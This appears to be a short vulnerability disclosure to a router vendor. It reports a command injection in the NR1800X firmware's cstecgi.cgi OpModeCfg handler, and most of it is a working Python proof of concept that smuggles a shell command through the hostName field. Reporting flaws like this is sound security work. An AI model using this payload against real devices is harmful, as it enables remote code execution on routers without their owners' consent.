Hi, we found a command injection vulnerability at **NR1800X (**Firmware version V9.1.0u.6279_B20210910), and contact you at the first time.

In function OpModeCfg of the file /cgi-bin/cstecgi.cgi, string hostName not checked and passed to doSystem, result in command injection.

PoC

import requests

url = "<http://192.168.17.220:80/cgi-bin/cstecgi.cgi>"
cookie = {"Cookie":"uid=1234"}
data = {'topicurl' : "setOpModeCfg",
"proto" : "8",
"switchOpMode" : "1",
"hostName" : "';ls -lh ../ ;'"}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)

Impact

Remote code execution

After execute the poc, the ls command is executed